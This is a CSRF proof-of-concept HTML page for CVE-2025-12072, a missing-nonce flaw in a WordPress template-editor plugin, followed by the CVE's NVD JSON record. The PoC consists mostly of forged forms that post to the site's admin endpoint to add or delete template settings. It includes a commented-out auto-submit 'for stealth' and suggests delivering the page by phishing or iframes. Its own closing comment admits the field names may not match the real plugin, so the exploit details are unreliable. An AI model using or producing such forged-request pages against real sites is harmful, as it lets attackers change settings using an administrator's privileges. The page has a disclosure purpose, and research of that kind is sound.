CVE-2025-12072

<!-- CSRF PoC for CVE-2025-12072 --> <!-- Target: Disable Content Editor For Specific Template plugin <= 2.0 --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-12072</title> </head> <body> <h1>CSRF PoC for CVE-2025-12072</h1> <p>Click the button below to trigger the CSRF attack.</p> <!-- Option 1: Add a malicious template configuration --> <form action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="update_template_config"> <input type="hidden" name="template_id" value="malicious_template"> <input type="hidden" name="template_name" value="page-custom"> <input type="hidden" name="disable_editor" value="1"> <input type="submit" value="Add Malicious Template Config (Attack)"> </form> <!-- Option 2: Delete existing template configuration --> <form action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="update_template_config"> <input type="hidden" name="delete_config" value="1"> <input type="hidden" name="template_id" value="existing_template"> <input type="submit" value="Delete Template Config (Attack)"> </form> <!-- Auto-submit script for stealth attack --> <script> // Auto-submit on page load (for more stealthy attack) // document.forms[0].submit(); </script> </body> </html> <!-- Explanation: 1. The attacker creates a malicious page with forms that submit to the WordPress admin-post.php endpoint 2. The forms mimic the legitimate template configuration update requests 3. No nonce token is required due to the missing validation 4. When a logged-in administrator visits this page and submits the form, the action is executed with admin privileges 5. The attacker can deliver this via phishing email, social engineering, or embedding in iframes Note: This PoC demonstrates the vulnerability concept. Actual exploitation requires modification based on the specific plugin implementation. -->

{"cve": {"id": "CVE-2025-12072", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:44.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Disable Content Editor For Specific Template plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0. This is due to missing nonce validation on template configuration updates. This makes it possible for unauthenticated attackers to add or delete template configurations via a forged request granted they can trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/disable-contect-editor-for-specific-template/tags/2.0/disable-editor-specific-template.php#L57", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/243200f4-5a5d-4275-bf2b-f4cb6099d145?source=cve", "source": "[email protected]"}]}}